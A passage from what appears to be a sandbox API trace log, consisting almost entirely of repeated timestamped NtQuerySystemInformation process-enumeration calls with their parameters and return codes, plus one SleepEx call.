ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0103.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x163c8) returned 0x0 [0103.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x175a8) returned 0x0 [0103.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17450) returned 0x0 [0103.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x17950) returned 0x0 [0104.284] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0107.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x219a8) returned 0xc0000004 [0107.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19c90) returned 0x0 [0107.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, 